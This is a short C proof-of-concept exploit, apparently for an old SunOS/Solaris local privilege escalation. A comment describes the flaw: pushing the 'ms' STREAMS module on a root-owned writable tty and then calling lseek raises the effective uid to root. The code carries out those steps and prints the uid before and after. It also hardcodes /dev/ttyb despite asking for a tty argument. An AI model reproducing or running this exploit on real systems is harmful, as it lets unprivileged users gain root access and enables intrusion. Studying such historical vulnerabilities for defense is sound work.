/*
    Information for this security problem was obtained from Shawn Instenes
    who claims he got it from some engineers at Sun. He said that a
    patch existed for 2.4 but not 2.3. I was unable to find a patch
    for 2.4 or 2.3.

    If a tty port that is writeable by the user and owned by root is
    opened and the I_PUSH "ms" ioctl call made followed by an lseek
    the effective uid of the user is changed to root.
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <stropts.h>
#include <sys/stat.h>
#include <sys/conf.h>

main(argc, argv)
    int         argc;
    char*       argv[];
{
    int         fd;

    if (argc < 2)
        {
        fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
        exit(1);
        }

    fd = open("/dev/ttyb", O_RDWR);
    printf("Your current effective uid is %d\n", geteuid());
    ioctl(fd, I_PUSH, "ms");
    lseek(fd, 0, 1);
    printf("Your effective uid has been changed to %d\n", geteuid());
}